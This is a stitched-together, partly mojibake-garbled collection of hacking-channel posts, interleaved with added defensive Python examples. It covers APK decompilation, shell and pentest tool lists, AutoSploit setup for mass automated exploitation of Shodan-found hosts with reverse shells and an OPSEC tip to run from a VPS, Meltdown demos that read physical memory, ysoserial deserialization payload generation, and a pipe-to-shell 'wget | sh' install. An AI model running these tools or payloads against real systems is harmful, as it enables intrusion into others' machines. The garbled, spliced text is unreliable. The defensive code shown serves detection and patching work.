UNDERCODE COMMUNITY
🦑 Undercode Cyber World!
@UndercodeCommunity


1️⃣ World's first platform that collects and analyzes every new hacking method,
+ AI practice
@Undercode_Testing

2️⃣ Cyber & Tech NEWS:
@Undercode_News

3️⃣ CVE @Daily_CVE

✨ Web & Services:
→ Undercode.help
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 Cracking any Android apk: the process, by UndercOde (2 main methods) >
Briefly, the generation process of an Android apk:
t.me/UndercOdeTesting

πŸ¦‘ π•ƒπ”Όπ•‹π•Š π•Šπ•‹π”Έβ„π•‹ :

1) Java source code

2) Java compilation (javac)

3) class files

4) dx tool conversion (class to dex) and packaging/compression

5) Add third-party and other library files

6) dex file

7) apkbuilder packaging

8) Plus the other resource files (resources.arsc, other libraries, etc.)
(Unsigned) apk file

9) jarsigner to sign + zipalign to process
(Signed) apk file

10) Can be published and listed on the various Android application markets

11) Ordinary users download, install and try it
@UndercOdeTesting
🦑 To crack the Android apk, the reverse operation:

1) Reverse (hook and dump) the dex file from the apk (from the app at runtime)

2) If it is an ordinary reinforcement (packing/hardening) scheme,

3) you can successfully export the dex with tools such as FDex2

4) If it is an advanced reinforcement scheme,

5) it is presumably more difficult

6) Decompile the dex file into a jar package (containing the various classes)

7) Some dex files produce various errors on decompilation,

8) which suggests that the reinforcement scheme is more advanced.

9) Some dex files decompile without error

10) If this dex contains the code we want, i.e. the app's business logic,

11) then the program's Java source code can subsequently be recovered (cracked) completely

12) Decompile the Java source code from the jar package

13) You can view and export all of the Java source code
note:

> If the code was obfuscated beforehand,

14) what you finally get is the obfuscated code

🦑 and it is not easy to see the business logic of the original code
Description

1) This process is the inverse of the compilation above, so strictly it is called:

> decompilation (decompile)

2) The corresponding tool is called a decompiler
Decompiler (sometimes loosely called a decoder) = the tool that performs decompilation

Written by UndercOde
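The build pipeline above ends with a zip file: dex files, resources.arsc, native libraries and the jarsigner output under META-INF/. The script below is an added example (not from the UnderCode post) that inspects an APK as that zip, checks each dex entry's magic and reports whether the v1 signature artifacts are present; a dex entry with a wrong header is flagged, which is what a packed ("reinforced") app looks like before dumping. It uses only the Python standard library, and the sample APK is constructed in memory so the script runs offline.

```python
# Added example (not from the UnderCode post): inspect an APK as the zip it is,
# list the dex entries and the signing artifacts produced by jarsigner, and verify
# each dex file's magic.  Standard library only; the sample APK is constructed.
import io
import re
import zipfile

DEX_MAGIC_RE = re.compile(rb"^dex\n0[0-9]{2}\x00")   # "dex\n035\0", "dex\n038\0", ...


def inspect_apk(apk_bytes: bytes) -> dict:
    """Return what a packager put in the APK: dex files, resources, native libs
    and the v1 (jarsigner) signature files in META-INF/."""
    report = {"dex": [], "bad_dex": [], "resources_arsc": False,
              "native_libs": [], "v1_signed": False, "signature_files": []}
    with zipfile.ZipFile(io.BytesIO(apk_bytes)) as zf:
        for name in zf.namelist():
            if re.fullmatch(r"classes\d*\.dex", name):
                data = zf.read(name)
                if DEX_MAGIC_RE.match(data):
                    report["dex"].append(name)
                else:
                    # wrong magic: corrupt, or encrypted/packed by a hardening scheme
                    report["bad_dex"].append(name)
            elif name == "resources.arsc":
                report["resources_arsc"] = True
            elif name.startswith("lib/") and name.endswith(".so"):
                report["native_libs"].append(name)
            elif name.startswith("META-INF/") and name.upper().endswith((".RSA", ".DSA", ".EC", ".SF")):
                report["signature_files"].append(name)
    # jarsigner writes a signature file (.SF) plus a signature block (.RSA/.DSA/.EC)
    has_sf = any(n.upper().endswith(".SF") for n in report["signature_files"])
    has_block = any(n.upper().endswith((".RSA", ".DSA", ".EC")) for n in report["signature_files"])
    report["v1_signed"] = has_sf and has_block
    return report


def build_sample_apk(signed: bool) -> bytes:
    """Construct a minimal APK-shaped zip (sample data, not a real app)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("AndroidManifest.xml", b"<constructed binary manifest>")
        zf.writestr("classes.dex", b"dex\n035\x00" + b"\x00" * 64)
        zf.writestr("classes2.dex", b"\x00\x01\x02\x03" + b"\x00" * 64)   # not a dex header
        zf.writestr("resources.arsc", b"\x02\x00\x0c\x00")
        zf.writestr("lib/arm64-v8a/libnative.so", b"\x7fELF" + b"\x00" * 16)
        if signed:
            zf.writestr("META-INF/MANIFEST.MF", b"Manifest-Version: 1.0\n")
            zf.writestr("META-INF/CERT.SF", b"Signature-Version: 1.0\n")
            zf.writestr("META-INF/CERT.RSA", b"<constructed PKCS#7 blob>")
    return buf.getvalue()


if __name__ == "__main__":
    for signed in (False, True):
        print(inspect_apk(build_sample_apk(signed)))
```

Point inspect_apk at a real file with open(path, "rb").read(); a release APK from a store should come back with v1_signed True (or carry the newer APK Signature Scheme block, which this check does not parse) and no entries in bad_dex.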
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 Shells
The best base shells used by hackers
> twitter.com/UndercOdeTC

πŸ¦‘ π•ƒπ”Όπ•‹π•Š π•Šπ•‹π”Έβ„π•‹ :

1) bash - GNU Project's shell (Bourne Again SHell)
> https://www.gnu.org/software/bash/

2) elvish - Friendly, expressive shell with features like anonymous functions and data structures
> https://elv.sh/

3) fish - Smart and user-friendly command line shell
> https://fishshell.com/

4) ksh93 - Korn Shell
> https://github.com/att/ast

5) mksh - MirBSD Korn Shell

6) nushell - A modern shell written in Rust
> https://github.com/nushell/nushell

7) oksh - Portable OpenBSD ksh

8) osh - Bash compatible, with a new/modern Unix shell language called Oil

9) pdksh - Public domain Korn shell

10) shell++ - Friendly and modern functional and object oriented shell script language

11) shenv - Simple shell version management

12) tcsh - C shell with file name completion and command line editing

13) xiki - Makes the shell console more friendly and powerful

14) xonsh - Python-ish, BASHwards-looking shell language and command prompt

15) yash - A POSIX-compliant command line shell with built-in support for completion and prediction based on command history

16) zsh - Powerful shell with scripting language

@UndercOdeOfficial
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 Custom prompts, color themes: the best free, open-source tools for Linux (GitHub repos)
pinterest.com/UndercOdeOfficial

πŸ¦‘ π•ƒπ”Όπ•‹π•Š π•Šπ•‹π”Έβ„π•‹ :

1) base16-builder - Base16-Builder

2) bash-full-of-colors - Powerful prompt with screen, tmux, git support and many more

3) bash-git-prompt - An informative and fancy Bash prompt for Git users

4) bash-powerline - Powerline-style Bash prompt in pure Bash script

5) bashstrap - A quick way to spruce up the OSX terminal

6) bullet-train-oh-my-zsh-theme - An oh-my-zsh shell theme based on the Powerline Vim plugin

7) emojify - Emoji on the command line

8) flatui-terminal-theme - Nicer colors for the terminal

9) geometry - A minimal ZSH theme where any function can be added to the left prompt or (async) right prompt on the fly.

10) git-prompt - Bash prompt with Git, SVN and HG modules

11) gittify - A colorful Bash prompt + customized Git aliases

12) Gogh - Color Scheme - Color Scheme for Gnome Terminal

13) liquidprompt - A full-featured & carefully designed adaptive prompt for Bash & Zsh

14) mysql-colorize - Colorization for the mysql command-line client

15) oh-my-git - An opinionated git prompt for bash and zsh

16) polyglot - An informative Git prompt that works in bash, zsh, ksh, mksh, pdksh, dash, and busybox sh

@UndercOdeOfficial
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 Tools needed for security penetration testing, any Linux OS, 2020
instagram.com/UndercOdeTestingCompany

πŸ¦‘ π•ƒπ”Όπ•‹π•Š π•Šπ•‹π”Έβ„π•‹ :

Tools required for penetration testing (package names):

splint, pscan, flawfinder, rats, ddrescue, gparted, testdisk, foremost, sectool-gui, unhide, examiner, srm, nwipe, firstaidkit-gui, net-snmp, hexedit, irssi, powertop, mutt, nano, vim-enhanced, wget, yum-utils, mcabber, firstaidkit-plugin-all, vnstat, aircrack-ng, airsnort, kismet, weplab

xmount, dc3dd, afftools, scanmem, sleuthkit, macchanger, ngrep, ntfs-3g, ntfsprogs, pcapdiff, netsed, dnstop, sslstrip, bonesi, proxychains, prewikka, prelude-manager, picviz-gui, telnet, openssh, dnstracer, chkrootkit, aide, pads, cowpatty

scrub, ht, driftnet, binwalk, scalpel, pdfcrack, wipe, safecopy, hfsutils, cmospwd, security-menus, nc6, mc, screen, openvas-scanner, rkhunter, labrea, nebula, tripwire, prelude-lml, iftop, scamper, iptraf-ng, iperf, nethogs, uperf, nload, ntop, trafshow, wavemon

@UndercOdeOfficial
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 2019 late update, topic: exploit script (AutoSploit):
pinterest.com/UndercodeOfficial

🦑 Features :

1) As the name might suggest, AutoSploit attempts to automate the exploitation of remote hosts.

2) Targets can be collected automatically through Shodan, Censys or Zoomeye.

> But options to add your own custom targets and host lists have been included as well.

3) The available Metasploit modules have been selected to facilitate Remote Code Execution and to attempt to gain Reverse TCP Shells and/or Meterpreter sessions. Workspace, local host and local port for MSF-facilitated back connections are configured by filling out the dialog that comes up before the exploit component is started.

4) Operational Security Consideration:
Receiving back connections on your local machine might not be the best idea from an OPSEC standpoint. Instead consider running this tool from a VPS that has all the required dependencies available.

5) The new version of AutoSploit has a feature that allows you to set a proxy before you connect, and a custom user-agent.

πŸ¦‘π•€β„•π•Šπ•‹π”Έπ•ƒπ•ƒπ•€π•Šπ”Έπ•‹π•€π•†β„• & β„π•Œβ„•

> Docker Compose
Using Docker Compose is by far the easiest way to get AutoSploit up and running without too much of a hassle.

1) git clone https://github.com/NullArray/AutoSploit.git

2) cd AutoSploit/Docker

3) docker-compose run --rm autosploit

🦑 Just using Docker.

1) git clone https://github.com/NullArray/AutoSploit.git

2) cd AutoSploit/Docker
# If you wish to edit the default postgres service details, edit database.yml. It should work out of the box.
# nano database.yml

3) docker network create -d bridge haknet

4) docker run --network haknet --name msfdb -e POSTGRES_PASSWORD=s3cr3t -d postgres

5) docker build -t autosploit .

6) docker run -it --network haknet -p 80:80 -p 443:443 -p 4444:4444 autosploit

🦑 Any Linux

1) git clone https://github.com/NullArray/AutoSploit

2) cd AutoSploit

3) chmod +x install.sh

4) ./install.sh

🦑 macOS

> AutoSploit is compatible with macOS; however, you have to be inside a virtual environment for it to run successfully. To accomplish this, perform the operations below via the terminal or in the form of a shell script.

1) sudo -s << '_EOF'

2) pip2 install virtualenv --user

3) git clone https://github.com/NullArray/AutoSploit.git

4) virtualenv <PATH-TO-YOUR-ENV>

5) source <PATH-TO-YOUR-ENV>/bin/activate

6) cd <PATH-TO-AUTOSPLOIT>

7) pip2 install -r requirements.txt

8) chmod +x install.sh

9) ./install.sh

10) python autosploit.py
_EOF

@UndercOdeOfficial
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁
# SUPPORT & SHARE

T.me/UndercOdeTesting
🦑 All HTTP injector tricks in Africa > patched > latest report
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 Meltdown, latest bug:
The applications in this repository are built with libkdump, a library we developed for the paper. This library simplifies exploitation of the bug by automatically adapting to certain properties of the environment.
twitter.com/UndercOdeTC

πŸ¦‘π•€β„•π•Šπ•‹π”Έπ•ƒπ•ƒπ•€π•Šπ”Έπ•‹π•€π•†β„• & β„π•Œβ„•

On Ubuntu

1) A static glibc is required: on Fedora/CentOS install it with sudo yum install -y glibc-static; on Ubuntu the static archive ships in the libc6-dev package (sudo apt-get install -y libc6-dev)

2) git clone https://github.com/IAIK/meltdown

3) make

4) taskset 0x1 ./test

5) + A demo video is in the same git repository

🦑 Starting with Linux kernel 4.12, KASLR (Kernel Address Space Layout Randomization) is active by default. This means that the location of the kernel (and also of the direct physical map, which maps the entire physical memory) changes with each reboot.

1) This demo uses Meltdown to leak the (secret) randomization of the direct physical map. This demo requires root privileges to speed up the process. The paper describes a variant which does not require root privileges.

> Build and Run

> make

>sudo taskset 0x1 ./kaslr

2) After a few seconds, you should see something similar to this

[+] Direct physical map offset: 0xffff880000000000

🦑 Reliability test (reliability)
This demo tests how reliably physical memory can be read. For this demo, you either need the direct physical map offset or you have to disable KASLR by specifying nokaslr in your kernel command line.

> Build and Run

Build and start reliability. If you have KASLR enabled, the first parameter is the offset of the direct physical map. Otherwise, the program does not require a parameter.

> make

> sudo taskset 0x1 ./reliability 0xffff880000000000

> After a few seconds, you should get an output similar to this:

[-] Success rate: 99.93% (read 1354 values)
🦑 Demo #4: Read physical memory (physical_reader)

> This demo reads memory from a different process by directly reading physical memory. For this demo, you either need the direct physical map offset or you have to disable KASLR by specifying nokaslr in your kernel command line.

> In principle, this program can read arbitrary physical addresses. However, as the physical memory contains a lot of non-human-readable data, we provide a test tool (secret), which puts a human-readable string into memory and directly provides the physical address of this string.

1) Build and Run
For the demo, first run secret (as root) to get the physical address of a human-readable string:

2) make

3) sudo ./secret
It should output something like this:

[+] Secret: If you can read this, this is really bad
[+] Physical address of secret: 0x390fff400
[+] Exit with Ctrl+C if you are done reading the secret
While the secret program is running, start physical_reader. The first parameter is the physical address printed by secret. If you do not have KASLR disabled, the second parameter is the offset of the direct physical map.

4) taskset 0x1 ./physical_reader 0x390fff400 0xffff880000000000
After a few seconds, you should get an output similar to this:

[+] Physical address : 0x390fff400
[+] Physical offset : 0xffff880000000000
[+] Reading virtual address: 0xffff880390fff400

If you can read this, this is really bad

🦑 Dump the memory (memdump)
This demo dumps the contents of the memory. Like demos #3 and #4, it uses the direct physical map to dump the contents of the physical memory in a hexdump-like format.

> Again, as the physical memory contains a lot of non-human-readable content, we provide a test tool to fill large amounts of the physical memory with human-readable strings.

Build and Run
For the demo, first run memory_filler to fill the memory with human-readable strings. The first argument is the amount of memory (in gigabytes) to fill.

> make

> ./memory_filler 9

> Then, run the memdump tool to dump memory contents. If you executed memory_filler before, you should see some string fragments. If you have Firefox or Chrome with multiple tabs running, you might also see parts of the websites which are open or were recently closed.

@UndercOdeOfficial
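Every demo above depends on two kernel-side settings: whether KPTI (the Meltdown mitigation) is active and whether KASLR has been switched off with nokaslr. The following is an added example, not part of the IAIK repository or this post, that reads the status a Linux kernel publishes in /sys/devices/system/cpu/vulnerabilities/meltdown and /proc/cmdline and classifies the host. The two sample inputs are constructed strings in the kernel's own output format so the check runs offline; read_live() reads the real files when they exist.

```python
# Added example (not from the IAIK repository or the UnderCode post): report the
# kernel-side Meltdown mitigations the demos depend on.  Linux exposes the CPU
# vulnerability status under /sys/devices/system/cpu/vulnerabilities/ and the
# boot parameters in /proc/cmdline; the samples below are constructed in that format.
from pathlib import Path

VULN_DIR = Path("/sys/devices/system/cpu/vulnerabilities")


def assess(meltdown_status: str, cmdline: str) -> dict:
    """Classify a host from the sysfs 'meltdown' string and the kernel command line."""
    status = meltdown_status.strip()
    params = cmdline.split()
    result = {
        "status": status,
        # "Not affected" (unaffected CPU) or "Mitigation: PTI" (KPTI active)
        "kpti": status.startswith("Mitigation: PTI"),
        "not_affected": status == "Not affected",
        "vulnerable": status.startswith("Vulnerable"),
        # the demos suggest nokaslr to skip the offset search; it also removes a defence
        "nokaslr": "nokaslr" in params,
        # nopti / pti=off explicitly disable the Meltdown mitigation
        "pti_disabled": any(p in ("nopti", "pti=off") for p in params),
    }
    result["exposed"] = result["vulnerable"] or result["pti_disabled"]
    return result


def read_live() -> dict:
    """Read the real sysfs/procfs files (returns an 'unknown' status if absent)."""
    try:
        status = (VULN_DIR / "meltdown").read_text()
        cmdline = Path("/proc/cmdline").read_text()
    except OSError:
        return {"status": "unknown", "exposed": None}
    return assess(status, cmdline)


# Constructed samples in the same format as the kernel's own output.
SAMPLE_PATCHED = ("Mitigation: PTI\n",
                  "BOOT_IMAGE=/vmlinuz root=/dev/sda1 ro quiet\n")
SAMPLE_DEMO_BOX = ("Vulnerable\n",
                   "BOOT_IMAGE=/vmlinuz root=/dev/sda1 ro nokaslr nopti\n")

if __name__ == "__main__":
    print(assess(*SAMPLE_PATCHED))
    print(assess(*SAMPLE_DEMO_BOX))
    print(read_live())
```

On a patched host the demos fail because KPTI keeps kernel and direct-map pages out of the user page tables; the "exposed" flag is the one to alert on in fleet inventory, and a nokaslr or nopti boot parameter on a production machine deserves a ticket of its own.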
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 How to generate payloads that exploit unsafe Java object deserialization

1) ysoserial is a collection of utilities and property-oriented programming "gadget chains" discovered in common Java libraries that can, under the right conditions, exploit Java applications performing unsafe deserialization of objects.

2) The main driver program takes a user-specified command and wraps it in the user-specified gadget chain, then serializes these objects to stdout. When an application with the required gadgets on the classpath unsafely deserializes this data, the chain will automatically be invoked and cause the command to be executed on the application host.
t.me/UndercOdeTesting

πŸ¦‘π•€β„•π•Šπ•‹π”Έπ•ƒπ•ƒπ•€π•Šπ”Έπ•‹π•€π•†β„• & β„π•Œβ„•

1) git clone https://github.com/frohoff/ysoserial

2) cd ysoserial

3) java -jar ysoserial.jar
Y SO SERIAL?
Usage: java -jar ysoserial.jar [payload] '[command]'
Available payload types:
Payload      Authors                        Dependencies
-------      -------                        ------------
BeanShell1   @pwntester, @cschneider4711    bsh:2.0b5
C3P0         @mbechler                      c3p0:0.9.5.2, mchange-commons-java:0.2.11
Clojure      @JackOfMostTrades              clojure:1.8.0

... (remaining payload types elided)

4) java -jar ysoserial.jar CommonsCollections1 calc.exe | xxd

5) mvn clean package -DskipTests
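The payloads described above only work if the application deserializes attacker-supplied bytes and has the gadget classes on its classpath. The following is an added example, not part of ysoserial or this post, showing the defender's side: recognise a Java serialized stream in a request body (raw, base64 or hex encoded), pull out the class names it references, and compare them with an allowlist, which is the idea behind a JEP 290 deserialization filter. The stream bytes are constructed by hand from the Java Object Serialization Stream format, and the allowlist and class names are sample values.

```python
# Added example, not part of ysoserial or the UnderCode post: detect Java serialized
# objects in request bodies and allowlist the class names they reference.
# Stream samples are constructed; the allowlist is a sample policy.
import base64
import re
import struct

STREAM_MAGIC = b"\xac\xed\x00\x05"      # STREAM_MAGIC + STREAM_VERSION
B64_PREFIX = b"rO0AB"                   # base64 of those same four bytes
HEX_PREFIX = b"aced0005"
TC_CLASSDESC = 0x72
CLASS_NAME_RE = re.compile(rb"^\[*L?[A-Za-z_$][\w$]*(?:\.[A-Za-z_$][\w$]*)*;?$")


def decode_body(body: bytes):
    """Return the raw serialized stream if the body carries one (raw, base64 or hex)."""
    if body.startswith(STREAM_MAGIC):
        return body
    if body.lstrip().startswith(B64_PREFIX):
        return base64.b64decode(body.strip())
    if body.lstrip().lower().startswith(HEX_PREFIX):
        return bytes.fromhex(body.strip().decode("ascii"))
    return None


def referenced_classes(stream: bytes) -> list:
    """Heuristically pull class names out of TC_CLASSDESC records: 0x72, a big-endian
    2-byte UTF length, then the name.  Good enough for a detection rule, not a parser."""
    names = []
    for i, b in enumerate(stream):
        if b != TC_CLASSDESC or i + 3 > len(stream):
            continue
        n = struct.unpack(">H", stream[i + 1:i + 3])[0]
        cand = stream[i + 3:i + 3 + n]
        if 0 < n <= 200 and len(cand) == n and CLASS_NAME_RE.match(cand):
            names.append(cand.decode("ascii"))
    return names


def audit(body: bytes, allowlist: set) -> dict:
    """Flag a body that is a serialized stream referencing classes outside the allowlist."""
    stream = decode_body(body)
    if stream is None:
        return {"serialized": False, "classes": [], "disallowed": []}
    classes = referenced_classes(stream)
    return {"serialized": True, "classes": classes,
            "disallowed": [c for c in classes if c not in allowlist]}


def class_desc(name: bytes) -> bytes:
    """Constructed TC_OBJECT + TC_CLASSDESC prefix: name, serialVersionUID, flags,
    zero fields, TC_ENDBLOCKDATA, TC_NULL super class."""
    return (b"s" + bytes([TC_CLASSDESC]) + struct.pack(">H", len(name)) + name
            + b"\x00" * 7 + b"\x01" + b"\x02" + b"\x00\x00" + b"x" + b"p")


ALLOWLIST = {"java.util.HashMap", "java.lang.String"}            # sample policy
GADGET_STREAM = STREAM_MAGIC + class_desc(b"org.apache.commons.collections.map.LazyMap")
BENIGN_STREAM = STREAM_MAGIC + class_desc(b"java.util.HashMap")
B64_BODY = base64.b64encode(BENIGN_STREAM)
HEX_BODY = GADGET_STREAM.hex().encode("ascii")
JSON_BODY = b'{"user": "alice"}'

if __name__ == "__main__":
    for body in (GADGET_STREAM, B64_BODY, HEX_BODY, JSON_BODY):
        print(audit(body, ALLOWLIST))
```

In production the same decision belongs inside the JVM (an ObjectInputFilter with an allowlist of expected classes), because a byte-level scan can be evaded by unusual encodings; the scan above is still useful as a WAF or IDS rule and as a triage tool for captured traffic.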

@UndercOdeOfficial
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 General X Window options > commands :
t.me/UndercOdeTesting

πŸ¦‘ π•ƒπ”Όπ•‹π•Š π•Šπ•‹π”Έβ„π•‹ :

> Descriptions of the commands of the X Window System. These commands have a common set of parameters. Instead of listing these parameters in the description of each command, we list them here.
> General X Window Options

PARAMETER                    VALUE                      DESCRIPTION
-background color            e.g. red, green, blue      Sets the background color of the window
-bg color                                               Sets the background color of the window
-display system:number       X server number, usually 0 Uses the X server with the given number on the given system
-fg color                                               Sets the foreground (primary) color of the window
-fn font                                                Uses the specified font
-font font                                              Uses the specified font
-foreground color            e.g. red, green, blue      Sets the foreground (primary) color of the window
-geometry widthxheight+x+y                              Sets the window size and position
-geometry widthxheight                                  Sets the window size
-geometry +x+y                                          Sets the position of the upper-left corner of the window
-height lines                                           Sets the window height, in rows of text
-position x y                                           Sets the position of the upper-left corner of the window, in pixels
@UndercOdeOfficial
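The -geometry value is the one option in that table with real syntax: an optional widthxheight followed by an optional signed pair of offsets, where a minus sign means the offset is measured from the right or bottom edge of the screen (the XParseGeometry convention). The parser below is an added example, not from the post; it accepts that grammar, rejects malformed values, and re-emits a normalised string, using only the Python standard library.

```python
# Added example (not from the UnderCode post): parse and re-emit the -geometry
# argument shared by X Window programs, [<width>x<height>][{+-}<x>{+-}<y>].
import re

GEOMETRY_RE = re.compile(
    r"^(?:(?P<w>\d+)x(?P<h>\d+))?"                          # optional size part
    r"(?:(?P<xs>[+-])(?P<x>\d+)(?P<ys>[+-])(?P<y>\d+))?$"   # optional position part
)


def parse_geometry(spec: str) -> dict:
    """Return the size and position fields of an X geometry string.
    Missing fields are None; x_from_right / y_from_bottom record a '-' sign."""
    spec = spec.strip()
    m = GEOMETRY_RE.match(spec)
    if not spec or not m:
        raise ValueError(f"invalid geometry: {spec!r}")
    g = m.groupdict()
    return {
        "width": int(g["w"]) if g["w"] else None,
        "height": int(g["h"]) if g["h"] else None,
        "x": int(g["x"]) if g["x"] else None,
        "y": int(g["y"]) if g["y"] else None,
        "x_from_right": g["xs"] == "-",
        "y_from_bottom": g["ys"] == "-",
    }


def is_valid_geometry(spec: str) -> bool:
    """True if parse_geometry accepts the string."""
    try:
        parse_geometry(spec)
        return True
    except ValueError:
        return False


def format_geometry(geo: dict) -> str:
    """Inverse of parse_geometry, e.g. to re-emit a normalised -geometry value."""
    out = ""
    if geo["width"] is not None and geo["height"] is not None:
        out += f"{geo['width']}x{geo['height']}"
    if geo["x"] is not None and geo["y"] is not None:
        out += ("-" if geo["x_from_right"] else "+") + str(geo["x"])
        out += ("-" if geo["y_from_bottom"] else "+") + str(geo["y"])
    return out


if __name__ == "__main__":
    for spec in ("80x24+10+20", "+0-0", "640x480", "100x50-0+0", "80x"):
        if is_valid_geometry(spec):
            print(spec, "->", parse_geometry(spec), "->", format_geometry(parse_geometry(spec)))
        else:
            print(spec, "-> invalid")
```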
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 2020 updated GEF - GDB Enhanced Features for exploit devs & reversers
> GEF (pronounced ʀɛf - "Jeff") is a set of commands for x86/64, ARM, MIPS, PowerPC and SPARC to assist exploit developers and reverse-engineers when using old school GDB. It provides additional features to GDB using the Python API to assist during the process of dynamic analysis and exploit development. Application developers will also benefit from it, as GEF lifts a great part of regular GDB obscurity, avoiding repeating traditional commands, or bringing out the relevant information from the debugging runtime.
> t.me/UndercOdeTesting

πŸ¦‘π•€β„•π•Šπ•‹π”Έπ•ƒπ•ƒπ•€π•Šπ”Έπ•‹π•€π•†β„• & β„π•Œβ„•:

# via the install script
1) wget -q -O- https://github.com/hugsy/gef/raw/master/scripts/gef.sh | sh

# manually
2) wget -O ~/.gdbinit-gef.py -q https://github.com/hugsy/gef/raw/master/gef.py

3) echo source ~/.gdbinit-gef.py >> ~/.gdbinit
Then just start playing:

4) gdb -q /path/to/my/bin
gef➤ gef help

🦑 Features :

A few of GEF features include:

> One single GDB script.

> Entirely OS agnostic, NO dependencies: GEF is batteries-included and is installable in 2 seconds (unlike PwnDBG).

> Fast: limits the number of dependencies and optimizes code to make the commands as fast as possible (unlike PwnDBG).

> Provides a great variety of commands to drastically change your experience in GDB.

> Easily extendable to create other commands by providing a more comprehensible layout to the GDB Python API.

> Works consistently on both Python2 and Python3.

> Built around an architecture abstraction layer, so all commands work in any GDB-supported architecture such as x86-32/64, ARMv5/6/7, AARCH64, SPARC, MIPS, PowerPC, etc. (unlike PEDA)

> Suited for real-life apps debugging, exploit development, just as much as CTF (unlike PEDA or PwnDBG)

@UndercOdeOfficial
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 2020 Windows Exploit Suggester - Next Generation (WES-NG)
> Provides the list of vulnerabilities the OS is vulnerable to, including any exploits for these vulnerabilities. Every Windows OS between Windows XP and Windows 10, including their Windows Server counterparts, is supported.
> twitter.com/UndercodeTC

πŸ¦‘π•€β„•π•Šπ•‹π”Έπ•ƒπ•ƒπ•€π•Šπ”Έπ•‹π•€π•†β„• & β„π•Œβ„•:

1) On your Linux box

> git clone https://github.com/bitsadmin/wesng

2) cd wesng

> Obtain the latest database of vulnerabilities by executing the command wes.py --update.

3) Use Windows' built-in systeminfo.exe tool to obtain the system information of the local system, or from a remote system using systeminfo.exe /S MyRemoteHost, and redirect this to a file: systeminfo > systeminfo.txt

4) Execute WES-NG with the systeminfo.txt output file as the parameter: wes.py systeminfo.txt. WES-NG then uses the database to determine which patches are applicable to the system and to which vulnerabilities it is currently exposed, including exploits if available.

5) As the data provided by Microsoft's MSRC feed is frequently incomplete and false positives are reported by wes.py, make sure to check the Eliminating false positives page at the Wiki on how to interpret the results.

6) For an overview of all available parameters, check CMDLINE.md.

# top 2020

@UndercOdeOfficial
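Steps 3 and 4 above boil down to reading the OS build and the installed hotfix list out of systeminfo output and diffing it against what should be installed for that build. The script below is an added example, not from WES-NG or this post, that does exactly that much in the standard library: it parses a constructed English-locale systeminfo excerpt and reports the required updates that are neither installed nor superseded by a newer installed one. The KB numbers are placeholders, not real Microsoft update ids, and the field labels are locale dependent.

```python
# Added example, not from WES-NG or the UnderCode post: parse the parts of
# `systeminfo` output a patch-level check needs (OS build, installed KBs) and
# compare them against a required-update list.  All sample data is constructed.
import re

OS_VERSION_RE = re.compile(r"^OS Version:\s*(?P<ver>[\d.]+)\s+.*Build\s+(?P<build>\d+)", re.M)
OS_NAME_RE = re.compile(r"^OS Name:\s*(?P<name>.+?)\s*$", re.M)
HOTFIX_RE = re.compile(r"^\s*\[\d+\]:\s*(KB\d+)\s*$", re.M)


def parse_systeminfo(text: str) -> dict:
    """Extract OS name, version, build number and the set of installed hotfixes."""
    name = OS_NAME_RE.search(text)
    ver = OS_VERSION_RE.search(text)
    return {
        "os_name": name.group("name") if name else None,
        "os_version": ver.group("ver") if ver else None,
        "build": int(ver.group("build")) if ver else None,
        "hotfixes": set(HOTFIX_RE.findall(text)),
    }


def missing_updates(info: dict, required: dict) -> dict:
    """required maps KB id -> {description, superseded_by}; return what is absent.
    A cumulative update supersedes earlier ones, so a missing KB is cleared when
    any KB listed in its superseded_by chain is installed."""
    missing = {}
    for kb, meta in required.items():
        if kb in info["hotfixes"]:
            continue
        if any(s in info["hotfixes"] for s in meta.get("superseded_by", ())):
            continue
        missing[kb] = meta["description"]
    return missing


# Constructed systeminfo excerpt (English locale; labels differ per locale).
SAMPLE_SYSTEMINFO = """\
Host Name:                 WORKSTATION-01
OS Name:                   Microsoft Windows 10 Pro
OS Version:                10.0.18363 N/A Build 18363
Hotfix(s):                 3 Hotfix(s) Installed.
                           [01]: KB4000001
                           [02]: KB4000002
                           [03]: KB4000003
"""

# Constructed required-update list for this build (placeholder KB ids).
SAMPLE_REQUIRED = {
    "KB4000002": {"description": "cumulative update (sample)"},
    "KB4000004": {"description": "cumulative update (sample)",
                  "superseded_by": ["KB4000003"]},
    "KB4000009": {"description": "servicing stack update (sample)"},
}

if __name__ == "__main__":
    info = parse_systeminfo(SAMPLE_SYSTEMINFO)
    print(info)
    print(missing_updates(info, SAMPLE_REQUIRED))
```

The supersedence handling is the part that matters in practice: without it, every cumulative update ever released for the build shows up as missing, which is the false-positive problem step 5 refers to.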
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 UPDATED: Advanced vulnerability scanning with Nmap NSE
> Vulscan is a module which turns nmap into a vulnerability scanner. The nmap option -sV enables version detection per service, which is used to determine potential flaws according to the identified product. The data is looked up in an offline version of VulDB.
t.me/UndercOdeTesting

πŸ¦‘ π•ƒπ”Όπ•‹π•Š π•Šπ•‹π”Έβ„π•‹ :

1) Install the files into the following folder of your Nmap installation:

Nmap\scripts\vulscan\*

2) Clone the GitHub repository like this:

git clone https://github.com/scipag/vulscan scipag_vulscan

